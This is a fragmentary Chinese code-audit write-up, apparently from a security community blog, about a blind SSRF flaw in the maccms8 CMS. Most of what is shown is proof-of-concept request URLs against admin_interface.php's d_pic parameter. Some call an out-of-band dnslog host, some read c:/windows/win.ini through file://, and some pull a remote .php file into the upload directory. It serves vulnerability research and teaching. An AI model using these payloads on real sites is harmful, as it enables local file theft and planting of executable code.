文章首发于奇安信攻防社区《无回显SSRF的奇妙审计之旅》
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚
strpos(','.$uprule,'j')
$MAC['collect']['vod']['pic']==1
http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=1&d_type=1&d_pic=http://ckrooo.dnslog.cn
http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=1&d_type=1&d_pic=http:xxx.123.png
http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=1&d_type=1&d_pic=file:///c:/windows/win.ini
http://127.0.0.1/maccms8/upload/vod/2021-08-18/win.ini
http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=10&d_type=2&d_pic=http://xxx/1234.php
http://127.0.0.1/maccms8/upload/vod/2021-08-18/1234.php
本文始发于微信公众号(XG小刚):代码审计-无回显SSRF的奇妙审计之旅
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论